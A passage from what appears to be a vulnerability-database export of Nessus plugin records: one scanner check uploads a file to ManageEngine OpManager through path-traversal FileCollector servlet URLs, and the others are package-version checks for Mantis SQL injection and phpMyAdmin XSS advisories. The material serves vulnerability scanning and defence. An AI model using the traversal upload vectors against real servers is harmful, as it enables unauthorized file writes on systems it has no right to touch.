\"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=../../../webclient/common/css&FILENAME=\"+file,\n \"servlet/com.me.opmanager.extranet.remote.communication.fw.fe.FileCollector?regionID=..\\\\..\\\\..\\\\webclient\\\\common\\\\css&FILENAME=\"+file\n);\n\nuploaded = FALSE;\nexecuted = FALSE;\nvecurl = \"\";\nforeach vector (vectors)\n{\n\n res = http_send_recv3(\n port : port,\n method : \"POST\",\n item : dir+vector,\n data : postdata,\n content_type : \"text/html\",\n exit_on_fail : TRUE\n );\n exp_request = http_last_sent_request();\n\n # Try and access our uploaded file\n res = http_send_recv3(\n method : \"GET\",\n port : port,\n item : dir + \"webclient/common/css/\" +file,\n exit_on_fail : TRUE\n );\n\n # Only need to upload one file\n if(\"Nessus Check: \"+unique >< res[2])\n {\n uploaded = TRUE;\n vecurl = vector;\n break;\n }\n}\n\nif (uploaded)\n{\n security_report_v4(\n port : port,\n severity : SECURITY_HOLE,\n file : dir+\"webclient/common/css/\"+file,\n line_limit : 10,\n request : make_list(exp_request),\n output : chomp(res[2]),\n attach_type : 'text/plain'\n );\n} else audit(AUDIT_WEB_APP_NOT_AFFECTED, app, install_url);\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-08-19T12:48:42", "description": "Multiple SQL injection vulnerabilities have been discovered in the Mantis bug tracking system.", "cvss3": {"score": null, "vector": null}, "published": "2014-09-22T00:00:00", "type": "nessus", "title": "Debian DSA-3030-1 : mantis - security update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-1608", "CVE-2014-1609"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:mantis", "cpe:/o:debian:debian_linux:7.0"], "id": "DEBIAN_DSA-3030.NASL", "href": "https://www.tenable.com/plugins/nessus/77763", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-3030. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77763);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-1608\", \"CVE-2014-1609\");\n script_bugtraq_id(65445, 65461);\n script_xref(name:\"DSA\", value:\"3030\");\n\n script_name(english:\"Debian DSA-3030-1 : mantis - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple SQL injection vulnerabilities have been discovered in the\nMantis bug tracking system.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/wheezy/mantis\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2014/dsa-3030\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the mantis packages.\n\nFor the stable distribution (wheezy), these problems have been fixed\nin version 1.2.11-1.2+deb7u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:mantis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:7.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/20\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/22\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"7.0\", prefix:\"mantis\", reference:\"1.2.11-1.2+deb7u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2022-04-16T14:09:07", "description": "According to its self-reported version number, the phpMyAdmin application hosted on the remote web server is 4.0.x prior to 4.0.10.2, 4.1.x prior to 4.1.14.3, or 4.2.x prior to 4.2.7.1. It is, therefore, affected by the following vulnerabilities :\n\n - Multiple cross-site scripting vulnerabilities exist in the browser table, ENUM editor, monitor, query charts, and table relations pages. (CVE-2014-5273)\n\n - A flaw exists in the view operation page that allows a cross-site scripting attack. Note that this does not affect the 4.0.x releases. (CVE-2014-5274)\n\nNote that Nessus has not tested for these issues but has instead relied only on the application's self-reported version number.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-21T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.2 / 4.1.x < 4.1.14.3 / 4.2.x < 4.2.7.1 Multiple XSS Vulnerabilities (PMASA-2014-8 - PMASA-2014-9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2022-04-11T00:00:00", "cpe": ["cpe:/a:phpmyadmin:phpmyadmin"], "id": "PHPMYADMIN_PMASA_2014_9.NASL", "href": "https://www.tenable.com/plugins/nessus/77305", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77305);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/04/11\");\n\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n script_bugtraq_id(69268, 69269);\n\n script_name(english:\"phpMyAdmin 4.0.x < 4.0.10.2 / 4.1.x < 4.1.14.3 / 4.2.x < 4.2.7.1 Multiple XSS Vulnerabilities (PMASA-2014-8 - PMASA-2014-9)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote web server hosts a PHP application that is affected by\nmultiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to its self-reported version number, the phpMyAdmin\napplication hosted on the remote web server is 4.0.x prior to\n4.0.10.2, 4.1.x prior to 4.1.14.3, or 4.2.x prior to 4.2.7.1. It is,\ntherefore, affected by the following vulnerabilities :\n\n - Multiple cross-site scripting vulnerabilities exist in\n the browser table, ENUM editor, monitor, query charts,\n and table relations pages. (CVE-2014-5273)\n\n - A flaw exists in the view operation page that allows a\n cross-site scripting attack. Note that this does not\n affect the 4.0.x releases. (CVE-2014-5274)\n\nNote that Nessus has not tested for these issues but has instead\nrelied only on the application's self-reported version number.\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-8.php\");\n script_set_attribute(attribute:\"see_also\", value:\"http://www.phpmyadmin.net/home_page/security/PMASA-2014-9.php\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/647c9d12e33a6b64e1c3ff7487f72696bdf2dccb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?fea869a4\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/2c45d7caa614afd71dbe3d0f7270f51ce5569614\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1e1c0339\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/cd9f302bf7f91a160fe7080f9a612019ef847f1c\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b49d1fce\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/90ddeecf60fc029608b972e490b735f3a65ed0cb\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?274b0651\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/3ffc967fb60cf2910cc2f571017e977558c67821\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?cec3b0ca\");\n # https://github.com/phpmyadmin/phpmyadmin/commit/0cd293f5e13aa245e4a57b8d373597cc0e421b6f\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b6efd2e6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Either upgrade to phpMyAdmin 4.0.10.2 / 4.1.14.3 / 4.2.7.1 or later,\nor apply the patches from the referenced links.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No exploit is required\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/08/17\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/21\");\n\n script_set_attribute(attribute:\"potential_vulnerability\", value:\"true\");\n script_set_attribute(attribute:\"plugin_type\", value:\"remote\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:phpmyadmin:phpmyadmin\");\n script_set_attribute(attribute:\"thorough_tests\", value:\"true\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"CGI abuses : XSS\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"phpMyAdmin_detect.nasl\");\n script_require_keys(\"www/PHP\", \"www/phpMyAdmin\", \"Settings/ParanoidReport\");\n script_require_ports(\"Services/www\", 80);\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"http.inc\");\ninclude(\"webapp_func.inc\");\n\nport = get_http_port(default:80, php:TRUE);\n\ninstall = get_install_from_kb(appname:\"phpMyAdmin\", port:port, exit_on_fail:TRUE);\ndir = install['dir'];\nurl = build_url(qs:dir, port:port);\nversion = install['ver'];\n\nif (version == UNKNOWN_VER) audit(AUDIT_UNKNOWN_WEB_APP_VER, \"phpMyAdmin\", url);\nif (version =~ \"^4(\\.[012])?$\") audit(AUDIT_VER_NOT_GRANULAR, \"phpMyAdmin\", port, version);\nif (version !~ \"^4\\.[012][^0-9]\") audit(AUDIT_WEB_APP_NOT_INST, \"phpMyAdmin 4.0.x / 4.1.x / 4.2.x\", port);\n\nif (report_paranoia < 2) audit(AUDIT_PARANOID);\n\nre = make_array(\n -2, \"-beta(\\d+)\",\n -1, \"-rc(\\d+)\"\n);\n\n# Affected version\n# 4.0.x < 4.0.10.2\n# 4.1.x < 4.1.14.3\n# 4.2.x < 4.2.7.1\n\nif (version =~ \"^4\\.0\\.\")\n{\n cut_off = '4.0.0';\n fixed_ver = '4.0.10.2';\n}\n\nif (version =~ \"^4\\.1\\.\")\n{\n cut_off = '4.1.0';\n fixed_ver = '4.1.14.3';\n}\n\nif (version =~ \"^4\\.2\\.\")\n{\n cut_off = '4.2.0';\n fixed_ver = '4.2.7.1';\n}\n\nif (\n ver_compare(ver:version, fix:cut_off, regexes:re) >= 0 &&\n ver_compare(ver:version, fix:fixed_ver, regexes:re) == -1\n)\n{\n set_kb_item(name:'www/'+port+'/XSS', value:TRUE);\n\n if (report_verbosity > 0)\n {\n report =\n '\\n URL : ' + url +\n '\\n Installed version : ' + version +\n '\\n Fixed version : ' + fixed_ver +\n '\\n';\n security_note(port:port, extra:report);\n }\n else security_note(port);\n exit(0);\n}\nelse audit(AUDIT_WEB_APP_NOT_AFFECTED, \"phpMyAdmin\", url, version);\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:28", "description": "Versions of phpMyAdmin earlier than 4.0.10.2, 4.1.14.3, or 4.2.7.1 are unpatched for cross-site scripting vulnerabilities on the following pages:\n\n - The view operations page\n - browse table\n - ENUM editor\n - monitor\n - query charts and table relations pages\n\nNote that these vulnerabilities may only be leveraged by a user who is logged in.", "cvss3": {"score": 5.4, "vector": "CVSS:3.0/AV:N/AC:L/PR:L/UI:N/S:U/C:L/I:L/A:N"}, "published": "2014-10-02T00:00:00", "type": "nessus", "title": "phpMyAdmin 4.0.x < 4.0.10.2 / 4.1.x < 4.1.14.3 / 4.2.x < 4.2.7.1 Multiple XSS (PMASA-2014-8, PMASA-2014-9)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2019-03-06T00:00:00", "cpe": ["cpe:2.3:a:phpmyadmin:phpmyadmin:*:*:*:*:*:*:*:*"], "id": "8408.PRM", "href": "https://www.tenable.com/plugins/nnm/8408", "sourceData": "Binary data 8408.prm", "cvss": {"score": 5.5, "vector": "CVSS2#AV:N/AC:L/Au:S/C:P/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:35", "description": "Updated phpmyadmin package fixes security vulnerabilities :\n\nIn phpMyAdmin before 4.1.14.3, multiple XSS vulnerabilities exist in browse table, ENUM editor, monitor, query charts and table relations pages (CVE-2014-5273).\n\nIn phpMyAdmin before 4.1.14.3, with a crafted view name it is possible to trigger an XSS when dropping the view in view operation page (CVE-2014-5274).", "cvss3": {"score": null, "vector": null}, "published": "2014-09-12T00:00:00", "type": "nessus", "title": "Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:164)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2021-01-06T00:00:00", "cpe": ["p-cpe:/a:mandriva:linux:phpmyadmin", "cpe:/o:mandriva:business_server:1"], "id": "MANDRIVA_MDVSA-2014-164.NASL", "href": "https://www.tenable.com/plugins/nessus/77643", "sourceData": "#%NASL_MIN_LEVEL 70300\n\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Mandriva Linux Security Advisory MDVSA-2014:164. \n# The text itself is copyright (C) Mandriva S.A.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77643);\n script_version(\"1.5\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n script_bugtraq_id(69268, 69269);\n script_xref(name:\"MDVSA\", value:\"2014:164\");\n\n script_name(english:\"Mandriva Linux Security Advisory : phpmyadmin (MDVSA-2014:164)\");\n script_summary(english:\"Checks rpm output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Mandriva Linux host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Updated phpmyadmin package fixes security vulnerabilities :\n\nIn phpMyAdmin before 4.1.14.3, multiple XSS vulnerabilities exist in\nbrowse table, ENUM editor, monitor, query charts and table relations\npages (CVE-2014-5273).\n\nIn phpMyAdmin before 4.1.14.3, with a crafted view name it is possible\nto trigger an XSS when dropping the view in view operation page\n(CVE-2014-5274).\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://advisories.mageia.org/MGASA-2014-0344.html\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpmyadmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:mandriva:linux:phpmyadmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:mandriva:business_server:1\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/02\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/12\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Mandriva Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/Mandrake/release\", \"Host/Mandrake/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Mandrake/release\")) audit(AUDIT_OS_NOT, \"Mandriva / Mandake Linux\");\nif (!get_kb_item(\"Host/Mandrake/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^(amd64|i[3-6]86|x86_64)$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Mandriva / Mandrake Linux\", cpu);\n\n\nflag = 0;\nif (rpm_check(release:\"MDK-MBS1\", reference:\"phpmyadmin-4.2.8-1.mbs1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:58", "description": "phpMyAdmin 4.2.7.1 (2014-08-17) ===============================\n\n - [security] XSS in table browse page\n\n - [security] Self-XSS in enum value editor\n\n - [security] Self-XSSes in monitor\n\n - [security] Self-XSS in query charts\n\n - [security] XSS in view operations page\n\n - [security] XSS in relation view\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-29T00:00:00", "type": "nessus", "title": "Fedora 19 : phpMyAdmin-4.2.7.1-1.fc19 (2014-9534)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:19"], "id": "FEDORA_2014-9534.NASL", "href": "https://www.tenable.com/plugins/nessus/77424", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9534.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77424);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n script_bugtraq_id(69268, 69269);\n script_xref(name:\"FEDORA\", value:\"2014-9534\");\n\n script_name(english:\"Fedora 19 : phpMyAdmin-4.2.7.1-1.fc19 (2014-9534)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.7.1 (2014-08-17) ===============================\n\n - [security] XSS in table browse page\n\n - [security] Self-XSS in enum value editor\n\n - [security] Self-XSSes in monitor\n\n - [security] Self-XSS in query charts\n\n - [security] XSS in view operations page\n\n - [security] XSS in relation view\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1130865\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1130866\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/137126.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?e78ccb41\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:19\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/29\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^19([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 19.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC19\", reference:\"phpMyAdmin-4.2.7.1-1.fc19\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"phpMyAdmin\");\n}\n", "cvss": {"score": 3.5, "vector": "AV:N/AC:M/Au:S/C:N/I:P/A:N"}}, {"lastseen": "2021-08-19T12:48:45", "description": "phpMyAdmin 4.2.7.1 (2014-08-17) ===============================\n\n - [security] XSS in table browse page\n\n - [security] Self-XSS in enum value editor\n\n - [security] Self-XSSes in monitor\n\n - [security] Self-XSS in query charts\n\n - [security] XSS in view operations page\n\n - [security] XSS in relation view\n\nNote that Tenable Network Security has extracted the preceding description block directly from the Fedora security advisory. Tenable has attempted to automatically clean and format it as much as possible without introducing additional issues.", "cvss3": {"score": null, "vector": null}, "published": "2014-08-25T00:00:00", "type": "nessus", "title": "Fedora 20 : phpMyAdmin-4.2.7.1-1.fc20 (2014-9555)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-5273", "CVE-2014-5274"], "modified": "2021-01-11T00:00:00", "cpe": ["p-cpe:/a:fedoraproject:fedora:phpMyAdmin", "cpe:/o:fedoraproject:fedora:20"], "id": "FEDORA_2014-9555.NASL", "href": "https://www.tenable.com/plugins/nessus/77362", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Fedora Security Advisory 2014-9555.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77362);\n script_version(\"1.6\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/11\");\n\n script_cve_id(\"CVE-2014-5273\", \"CVE-2014-5274\");\n script_bugtraq_id(69268, 69269);\n script_xref(name:\"FEDORA\", value:\"2014-9555\");\n\n script_name(english:\"Fedora 20 : phpMyAdmin-4.2.7.1-1.fc20 (2014-9555)\");\n script_summary(english:\"Checks rpm output for the updated package.\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Fedora host is missing a security update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"phpMyAdmin 4.2.7.1 (2014-08-17) ===============================\n\n - [security] XSS in table browse page\n\n - [security] Self-XSS in enum value editor\n\n - [security] Self-XSSes in monitor\n\n - [security] Self-XSS in query charts\n\n - [security] XSS in view operations page\n\n - [security] XSS in relation view\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the Fedora security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1130865\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.redhat.com/show_bug.cgi?id=1130866\"\n );\n # https://lists.fedoraproject.org/pipermail/package-announce/2014-August/136988.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.nessus.org/u?51d8eacf\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\"Update the affected phpMyAdmin package.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:S/C:N/I:P/A:N\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"false\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:fedoraproject:fedora:phpMyAdmin\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:fedoraproject:fedora:20\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/08/19\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/08/25\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Fedora Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || \"Fedora\" >!< release) audit(AUDIT_OS_NOT, \"Fedora\");\nos_ver = eregmatch(pattern: \"Fedora.*release ([0-9]+)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Fedora\");\nos_ver = os_ver[1];\nif (! ereg(pattern:\"^20([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Fedora 20.x\", \"Fedora \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Fedora\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"FC20\", reference:\"phpMyAdmin-4.2.7.1-1.fc20\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_note(port:0, extra:rpm_report_get());\n else security_note(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n 